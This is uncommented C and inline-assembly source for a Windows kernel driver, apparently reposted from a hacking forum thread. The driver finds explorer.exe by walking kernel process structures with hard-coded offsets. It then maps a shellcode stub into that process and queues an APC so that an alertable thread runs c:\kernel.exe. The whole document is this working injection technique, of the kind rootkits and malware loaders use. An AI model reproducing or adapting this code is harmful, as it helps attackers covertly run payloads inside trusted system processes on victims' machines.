https://forum.eviloctal.com/thread-32192-1-1.html //By:Eros412 #include <ntddk.h> #include <ntifs.h> PKAPC_STATE ApcState; ULONG peprocess; ULONG explorer; PMDL mdl; typedef enum _KAPC_ENVIRONMENT { OriginalApcEnvironment, AttachedApcEnvironment, CurrentApcEnvironment, InsertApcEnvironment } KAPC_ENVIRONMENT; NTKERNELAPI VOID KeInitializeApc ( PKAPC Apc, PETHREAD Thread, KAPC_ENVIRONMENT Environment, PKKERNEL_ROUTINE KernelRoutine, PKRUNDOWN_ROUTINE RundownRoutine, PKNORMAL_ROUTINE NormalRoutine, KPROCESSOR_MODE ProcessorMode, PVOID NormalContext ); NTKERNELAPI BOOLEAN KeInsertQueueApc ( PKAPC Apc, PVOID SystemArgument1, PVOID SystemArgument2, KPRIORITY Increment ); NTKERNELAPI VOID ExFreePoolWithTag( IN PVOID P, IN ULONG Tag ); __declspec(naked) void call_me() { _asm{ mov eax,0x7C86136D push 1 nop push 0ABCDh call eax jmp here _emit 0x63 //路径:c:/kernel.exe _emit 0x3A _emit 0x5C _emit 0x6B _emit 0x65 _emit 0x72 _emit 0x6E _emit 0x65 _emit 0x6C _emit 0x2E _emit 0x65 _emit 0x78 _emit 0x65 _emit 0x00 _emit 0x00 here: nop retn 0x0C } } VOID OnUnload( IN PDRIVER_OBJECT pDriverObject ) { if(pDriverObject->DeviceObject!=NULL) IoDeleteDevice(pDriverObject->DeviceObject); } VOID myroutine( IN PKAPC Apc, IN OUT PKNORMAL_ROUTINE *NormalRoutine, IN OUT PVOID *NormalContext, IN OUT PVOID *SystemArgument1, IN OUT PVOID *SystemArgument2 ) { ExFreePoolWithTag(Apc,0); MmUnlockPages(mdl); IoFreeMdl(mdl); } NTSTATUS DriverEntry( IN PDRIVER_OBJECT pDriverObject, IN PUNICODE_STRING pRegistryPath ) { unsigned char alertable; int activethread; ULONG kthread; PLIST_ENTRY cur; PLIST_ENTRY next; PLIST_ENTRY tcur; PLIST_ENTRY tnext; unsigned char * imagename; UNICODE_STRING us; PDEVICE_OBJECT _device; PRKAPC apc; PVOID mappedmemory; ULONG jmpaddr_9; ULONG jmpaddr_14; RtlInitUnicodeString(&us,L"//Device//KernelExec"); IoCreateDevice(pDriverObject,0,&us,FILE_DEVICE_UNKNOWN,0x100,0,&_device); pDriverObject->DriverUnload=OnUnload; peprocess=(ULONG)IoGetCurrentProcess(); cur=next=(PLIST_ENTRY)((ULONG)peprocess+0x088); do{ imagename=(unsigned char*)ExAllocatePool(NonPagedPool,255); imagename=(unsigned char*)((ULONG)peprocess+0x174); activethread=*(ULONG*)((ULONG)peprocess+0x1a0); if(!_strnicmp(imagename,"explorer.exe",12)){ DbgPrint("%s/t%d threads",imagename,activethread); explorer=peprocess; tcur=tnext=(PLIST_ENTRY)((ULONG)peprocess+0x190); do{ kthread=(ULONG)tnext-0x22C; alertable=*(unsigned char*)(kthread+0x164); if((int)alertable==TRUE){ DbgPrint("KernelExec -> Found alertable thread"); break; } tnext=tnext->Flink; }while(tnext!=tcur); break; } next=next->Flink; peprocess=(ULONG)next-0x088; }while(next!=cur); DbgPrint("KernelExec -> Targeted thread: 0x%p",kthread); apc=ExAllocatePoolWithTag(NonPagedPool,0x30,0x206B6444); if(apc==NULL) DbgPrint("KernelExec -> Failed to allocate memory"); mdl=IoAllocateMdl(call_me,100,0,0,0); if(mdl==0){ DbgPrint("KernelExec -> Failed to allocate MDL"); ExFreePoolWithTag(apc,0); goto end1; } MmProbeAndLockPages(mdl,0,1); ApcState=ExAllocatePool(NonPagedPool,sizeof(KAPC_STATE)); KeStackAttachProcess((PKPROCESS)explorer,ApcState); mappedmemory=MmMapLockedPagesSpecifyCache(mdl,1,1,0,0,0x10); if(mappedmemory==NULL){ DbgPrint("KernelExec -> Cannot map address"); KeUnstackDetachProcess(ApcState); IoFreeMdl(mdl); ExFreePoolWithTag(apc,0); goto end1; } DbgPrint("KernelExec -> UserMode memory at address:0x%p",mappedmemory); jmpaddr_9 = (ULONG)mappedmemory+0x9; jmpaddr_14 = (ULONG)mappedmemory+0x14-3; //relative jmp 2字节,所以减3 _asm{ pushad pushfd mov ecx,jmpaddr_9 mov edx,jmpaddr_14 mov [ecx],edx popfd popad } KeUnstackDetachProcess (ApcState); KeInitializeApc(apc,(PETHREAD)kthread,0,myroutine,0,mappedmemory,1,0); if(!KeInsertQueueApc(apc,0,0,0)) DbgPrint("KernelExec -> Failed to insert APC"); DbgPrint("KernelExec -> APC delivered"); end1: return STATUS_SUCCESS; }